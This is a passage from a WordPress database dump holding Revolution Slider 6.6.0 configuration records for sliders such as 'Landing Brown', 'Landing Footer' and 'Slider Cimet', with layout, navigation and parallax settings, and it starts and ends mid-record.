Under\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(10,'Landing Brown','landingbrown','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landingbrown\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":902,\"n\":804,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#b68767\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(11,'Landing Footer','landingfooter','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landingfooter\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":650,\"n\":695,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#2d2a2a\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(12,'Slider Cimet','slidercimet','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"slidercimet\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":1200,\"n\":920,\"t\":960,\"m\":820},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#f7f7f7\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(13,'New Folder','new-folder','',NULL,'folder'),(14,'New Folder 1','new-folder-1','',NULL,'folder'),(15,'Slider 1','slider-1','{\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(16,'Slider 